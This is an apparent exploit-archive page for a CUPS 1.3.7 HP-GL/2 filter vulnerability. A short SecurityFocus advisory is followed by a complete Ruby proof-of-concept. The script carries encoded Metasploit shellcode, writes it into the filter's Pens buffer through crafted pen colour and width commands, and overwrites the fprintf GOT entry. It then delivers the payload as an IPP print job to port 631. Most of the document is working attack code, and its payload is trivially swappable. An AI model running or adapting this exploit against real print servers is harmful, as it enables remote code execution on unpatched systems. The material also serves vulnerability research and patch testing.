184 lines
No EOL
5.1 KiB
Ruby
Executable file
184 lines
No EOL
5.1 KiB
Ruby
Executable file
source: https://www.securityfocus.com/bid/31688/info
|
|
|
|
CUPS is prone to a remote code-execution vulnerability caused by an error in the 'HP-GL/2 filter.
|
|
|
|
Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely cause a denial-of-service condition. Note that local users may also exploit this vulnerability to elevate privileges.
|
|
|
|
Successful remote exploits may require printer sharing to be enabled on the vulnerable system.
|
|
|
|
The issue affects versions prior to CUPS 1.3.9.
|
|
|
|
NOTE: This issue was previously discussed in BID 31681 (Apple Mac OS X 2008-007 Multiple Security Vulnerabilities), but has been assigned its own record to better document the vulnerability.
|
|
|
|
#!/usr/bin/ruby -w
|
|
|
|
# CUPS 1.3.7 (HP-GL/2 filter) remote code execution
|
|
# gives uid=2(daemon) gid=7(lp) groups=7(lp)
|
|
# linux 2.6.25/randomize_va_space = 1, glibc 2.7
|
|
#
|
|
# An Introduction to HP-GL/2 Graphics
|
|
# http://www.tech-diy.com/HP%20Graphics%20Language.htm
|
|
# Internet Printing Protocol/1.1: Encoding and Transport
|
|
# http://tools.ietf.org/html/rfc2910
|
|
# Internet Printing Protocol/1.1: Model and Semantics
|
|
# http://tools.ietf.org/html/rfc2911
|
|
|
|
# :::::::::::::::::::::::::::::::::: setup ::::::::::::::::::::::::::::::::::
|
|
|
|
host = '127.0.0.1'
|
|
port = 631
|
|
printer = 'Virtual_Printer'
|
|
|
|
Pens_addr = 0x08073600 # objdump -T hpgltops | grep Pens$
|
|
fprintf_got = 0x080532cc # objdump -R hpgltops | grep fprintf
|
|
|
|
# linux_ia32_exec - CMD=/bin/touch /tmp/yello Size=84, metasploit.com
|
|
# encoder=PexFnstenvSub, restricted chars: 0xff
|
|
shellcode =
|
|
"\x2b\xc9\x83\xe9\xf1\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7c" +
|
|
"\x48\x22\xd6\x83\xeb\xfc\xe2\xf4\x16\x43\x7a\x4f\x2e\x2e\x4a\xfb" +
|
|
"\x1f\xc1\xc5\xbe\x53\x3b\x4a\xd6\x14\x67\x40\xbf\x12\xc1\xc1\x84" +
|
|
"\x94\x5e\x22\xd6\x7c\x67\x40\xbf\x12\x67\x56\xb9\x09\x2b\x4a\xf6" +
|
|
"\x53\x3c\x4f\xa6\x53\x31\x47\xba\x10\x27\x22\x81\x2f\xc1\xc3\x1b" +
|
|
"\xfc\x48\x22\xd6";
|
|
|
|
# :::::::::::::::::::::::::::::::::: code :::::::::::::::::::::::::::::::::::
|
|
|
|
# beacause of hpgl-attr.c:68-73 and 269-274
|
|
def CR_setup()
|
|
"CR0,1,0,1,0,1;"
|
|
end
|
|
|
|
# PS is a bit tricky here. final weight of pen (PW code) is calculated as:
|
|
# weight*=hypot(ps[0],ps[1])/1016.0*72.0 (which is NOT hypot/73152.0),
|
|
# where ps0=72.0*arg1/1016.0 and ps1=72.0*arg2/1016.0.
|
|
# so, hoping to get things accurate I set multiplier to 1.0
|
|
def PS_setup()
|
|
"WU1;" + # set the units used for pen widths
|
|
"RO0;" + # (do not) rotate the plot
|
|
"PS0,199.123455;"; # set the plot size
|
|
end
|
|
|
|
# alternative approach to fight floating point rounding errors
|
|
# first one seems to be more successful, though
|
|
def PS_setup_alt()
|
|
"WU0;" +
|
|
"RO0;";
|
|
end
|
|
|
|
# set the pen width (PS!)
|
|
def PW(width, pen)
|
|
"PW#{width},#{pen};"
|
|
end
|
|
|
|
def PW_alt(width, pen)
|
|
"PW#{width*25.4/72.0},#{pen};"
|
|
end
|
|
|
|
# "Set the pen color..."
|
|
def PC(pen, r, g, b)
|
|
"PC#{pen},#{r},#{g},#{b};"
|
|
end
|
|
|
|
# we'll be storing shellcode in Pens[1024] static buffer
|
|
# typedef struct
|
|
# {
|
|
# float rgb[3]; /* Pen color */
|
|
# float width; /* Pen width */
|
|
# } pen_t;
|
|
def memcpy(data)
|
|
while (data.length % 16 != 0)
|
|
data += "\x90";
|
|
end
|
|
s = ''
|
|
a = 0, b = 0, i = 0
|
|
data.unpack('f*').each { |f|
|
|
case ((i += 1) % 4)
|
|
when 1: a = f
|
|
when 2: b = f
|
|
when 3: s += PC(i/4, a, b, f)
|
|
else s += PW(f, (i-1)/4)
|
|
end
|
|
}
|
|
return s;
|
|
end
|
|
|
|
# overwrite all 16 bytes with the same value
|
|
def poke(addr, value)
|
|
f = [value].pack('i').unpack('f') # floatyfication!
|
|
i = (addr-Pens_addr)/16
|
|
return PC(i, f, f, f) + PW(f, i)
|
|
end
|
|
|
|
hpgl_data =
|
|
"BP;" + # to be recognized by CUPS
|
|
CR_setup() +
|
|
PS_setup() +
|
|
memcpy(shellcode) +
|
|
poke(fprintf_got, Pens_addr) +
|
|
PC(0, 0, 0, 0); # whatever
|
|
|
|
def attribute(tag, name, value)
|
|
[tag].pack('C') +
|
|
[name.length].pack('n') +
|
|
name +
|
|
[value.length].pack('n') +
|
|
value
|
|
end
|
|
|
|
# tag - meaning (rfc2910#section-3.5)
|
|
# 0x42 nameWithoutLanguage
|
|
# 0x45 uri
|
|
# 0x47 charset
|
|
# 0x48 naturalLanguage
|
|
operation_attr =
|
|
attribute(0x47, 'attributes-charset', 'utf-8') +
|
|
attribute(0x48, 'attributes-natural-language', 'en-us') +
|
|
attribute(0x45, 'printer-uri', "http://#{host}:#{port}/printers/#{printer}") +
|
|
attribute(0x42, 'job-name', 'zee greeteengz') +
|
|
attribute(0x42, 'document-format', 'application/vnd.hp-HPGL');
|
|
|
|
ipp_data =
|
|
"\x01\x00" + # version-number: 1.0
|
|
"\x00\x02" + # operation-id: Print-job
|
|
"\x00\x00\x00\x01" + # request-id: 1
|
|
"\x01" + # operation-attributes-tag
|
|
operation_attr +
|
|
"\x02" + # job-attributes-tag
|
|
"\x03" + # end-of-attributes-tag
|
|
hpgl_data;
|
|
|
|
http_request =
|
|
"""POST /printers/#{printer} HTTP/1.1
|
|
Content-Type: application/ipp
|
|
User-Agent: Internet Print Provider
|
|
Host: #{host}
|
|
Content-Length: #{ipp_data.length}
|
|
Connection: Keep-Alive
|
|
Cache-Control: no-cache
|
|
"""
|
|
|
|
require 'socket'
|
|
NL = "\r\n"
|
|
|
|
if (false)
|
|
# ./hpgltops 0 none none 1 '' output.hpgl
|
|
puts hpgl_data
|
|
puts "[+] dumping HP/GL-2 into output.hpgl"
|
|
f = File.new('output.hpgl', 'w')
|
|
f.write(hpgl_data)
|
|
f.close()
|
|
exit(0)
|
|
end
|
|
|
|
puts "[+] connecting to #{host}:#{port}"
|
|
s = TCPSocket.open(host, port)
|
|
puts "[+] asking #{printer} for a printout"
|
|
http_request.each_line { |line|
|
|
s.write(line.strip + NL)
|
|
}
|
|
s.write(NL)
|
|
s.write(ipp_data)
|
|
s.read(1)
|
|
s.close()
|
|
puts "[+] done" |